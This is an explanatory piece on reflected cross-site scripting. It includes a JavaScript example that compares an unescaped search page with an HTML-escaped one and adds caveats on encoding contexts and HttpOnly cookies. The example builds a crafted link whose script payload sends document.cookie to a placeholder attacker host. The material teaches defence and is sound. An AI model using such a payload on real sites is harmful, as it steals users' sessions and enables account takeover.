Cross-site scripting (XSS) is a vulnerability in dynamic Web pages that take input supplied to the web server and echo it back, unescaped, as part of the response to the browser. In a reflected XSS attack, a malicious user crafts a link whose parameters carry unwanted executable script (usually JavaScript) that the site then inserts into its own page. When an unsuspecting victim clicks the link, the injected JavaScript runs with the site's own origin and can, for example, send the victim's session cookie to a CGI script or other endpoint the attacker controls.
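The following is an added example, not code from the original article, showing the reflected-XSS pattern described above in plain JavaScript. It assumes a hypothetical search page that echoes the `q` query parameter back into its HTML; the host names `search.example.test` and `attacker.example.test` are placeholders. `renderUnsafe` concatenates the raw parameter (the vulnerable pattern), `renderSafe` HTML-escapes it first, and a crude check shows which rendering carries a live `<script>` tag.

```javascript
// Added example (not from the original article): reflected XSS in a
// hypothetical search page, vulnerable rendering beside the hardened one.

// Escape the characters that can change HTML context (text and attribute values).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the untrusted query lands in the page verbatim.
function renderUnsafe(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened: same page, but the query is escaped for the HTML text context.
function renderSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Extract the q parameter the way the server would (URL is a Node/browser built-in).
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') ?? '';
}

// Crude check used by this example: does the rendered HTML contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed attacker link (hypothetical hosts): the payload in q sends
// document.cookie to a server the attacker controls, as the text describes.
const craftedLink =
  'https://search.example.test/?q=' +
  encodeURIComponent(
    '<script>new Image().src="https://attacker.example.test/c?"' +
    '+encodeURIComponent(document.cookie)</script>'
  );

const query = queryFromUrl(craftedLink);
const unsafeHtml = renderUnsafe(query);
const safeHtml = renderSafe(query);

console.log('vulnerable page injects script:', containsScriptTag(unsafeHtml)); // true
console.log('hardened page injects script:  ', containsScriptTag(safeHtml));   // false
```

Two caveats a practitioner would want: `escapeHtml` is correct only for the HTML text and quoted-attribute contexts; a value inserted into a `<script>` block, a URL, or an event handler needs a different encoder for that context. And marking the session cookie `HttpOnly` stops `document.cookie` from reading it, which blunts this particular payload but does not fix the XSS, since the injected script can still issue requests as the logged-in user.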

A full security review usually involves more than just seeking out XSS vulnerabilities; it also involves overall threat modeling, testing for overflows, information disclosure, error handling, SQL injection, authentication, and authorization bugs.



